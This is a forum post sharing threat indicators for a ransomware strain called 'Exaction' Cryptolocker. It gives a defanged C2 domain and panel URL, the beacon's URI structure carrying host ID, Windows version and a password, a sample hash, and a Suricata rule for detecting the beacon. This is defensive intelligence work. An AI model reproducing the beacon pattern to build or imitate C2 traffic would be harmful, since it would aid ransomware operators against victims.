Search the Community
Showing results for tags 'msgexaction'.
Found 1 result
-
I searched and did not see this posted here yet, sorry if I missed it. C2 domain: cybercrime[.]rocks C2 URI struct: /cryptotolarance/add.php?hwid=[redacted]&winversion=[kernelversion]&pswd=[redacted] Panel: hxxp://cybercrime[.]rocks/cryptotolarance/login.php Payment onion returned from C2 on 3-18-15: iupfnqg2uaigwoei I have not done any debugging/RE on this, but it seems to check Geoloc (api.wipmania.com) and if US is returned does not carry out part of its functionality. Suricata rule: alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"Exaction Cryptolocker CnC Beacon"; flow:established,to_server; content:".php?"; http_uri; content:"hwid="; http_uri; content:"winversion="; http_uri; fast_pattern:only; content:"pswd="; http_uri; content:!"Referer|3a|"; http_header; reference:md5,b5ea8f65bd7845aeaf0732b8aacacc86; classtype:trojan-activity; sid:1; rev:1;) Download Pass: infected Source
